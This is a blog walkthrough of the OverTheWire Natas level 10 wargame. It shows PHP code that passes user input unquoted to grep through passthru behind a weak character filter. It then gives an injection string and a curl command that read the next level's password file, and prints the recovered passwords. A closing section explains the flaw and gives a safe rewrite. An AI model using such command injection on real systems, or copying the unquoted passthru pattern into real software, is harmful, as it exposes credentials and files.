Thursday 2 October 2014

Wargames - Natas 10

With the credentials discovered in the previous challenge, head over to http://natas10.natas.labs.overthewire.org and take a look at its content.
If you've read the previous challenge, this one is pretty much the same, so I won't cover what it's doing. Let's jump straight to the source code and see what differs from the previous one:
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas10", "pass": "<censored>" };</script></head>
<body>
<h1>natas10</h1>
<div id="content">

For security reasons, we now filter on certain characters<br/><br/>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>


Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>
Going straight to the point, the only difference in this challenge is the use of preg_match to block some shell metacharacters: specifically, we can't use ;, | and &. With this in mind, we need another approach. The good thing here is that we know what is being executed (grep in this case), so we just need to change what it's doing. We can easily do that with this input:
. /etc/natas_webpass/natas11 #
Which turns the passthru call into this:
grep -i . /etc/natas_webpass/natas11 # dictionary.txt
The . metacharacter matches any character, and the # you already know from the previous challenge. As always, you can just paste the input into the form or use curl:
curl --data "needle=. /etc/natas_webpass/natas11 #" http://natas10:nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu@natas10.natas.labs.overthewire.org/
Which gives the following output:
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas10", "pass": "nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu" };</script></head>
<body>
<h1>natas10</h1>
<div id="content">

For security reasons, we now filter on certain characters<br/><br/>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>


Output:
<pre>
U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>
As simple as the previous challenge: line 23 of the response, inside the <pre> block, holds the password for natas11.

User natas10
Password U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

Not much to say about this challenge: it's pretty much the same as the previous one, with just some minor changes due to the character filtering. You can take this solution and use it on the previous challenge as well.
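
Why the filter doesn't help, and what a fix looks like (an added example, not code from the level or from this post): the blacklist leaves spaces and # alone, so the needle is still split into several shell words. The code below passes it to grep as a single quoted argument, or skips the shell entirely; the DICTIONARY path and the function names are assumptions.

```php
<?php
// Added example, not the level's code. DICTIONARY is an assumed path.
const DICTIONARY = __DIR__ . '/dictionary.txt';

// Option 1: keep grep, but hand it the needle as exactly one argument.
function search_with_grep(string $needle): array
{
    // escapeshellarg() single-quotes the value, so spaces, '#', '$' and '`'
    // reach grep as data instead of being parsed by /bin/sh.
    // -F: fixed string, not a regex; -e: the next word is the pattern even if
    // it starts with '-'; --: everything after it is a file name, not an option.
    $cmd = 'grep -i -F -e ' . escapeshellarg($needle)
         . ' -- ' . escapeshellarg(DICTIONARY);
    exec($cmd, $lines, $status);
    // grep exits 0 on a match, 1 on no match, and >1 on an error.
    if ($status > 1) {
        throw new RuntimeException("grep failed with status $status");
    }
    return $lines;
}

// Option 2: no shell at all, so there is nothing for the needle to escape from.
function search_in_php(string $needle): array
{
    $words = file(DICTIONARY, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    if ($words === false) {
        throw new RuntimeException('cannot read dictionary');
    }
    return array_values(array_filter(
        $words,
        fn(string $w): bool => stripos($w, $needle) !== false
    ));
}

$key = $_REQUEST['needle'] ?? '';
if (is_string($key) && $key !== '') {
    foreach (search_with_grep($key) as $line) {
        // The page prints inside <pre>; encode so a match cannot inject HTML.
        echo htmlspecialchars($line, ENT_QUOTES, 'UTF-8'), "\n";
    }
}
```

With the needle from this post, both functions search the dictionary for the literal string ". /etc/natas_webpass/natas11 #" and never open a second file.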

Never Settle,
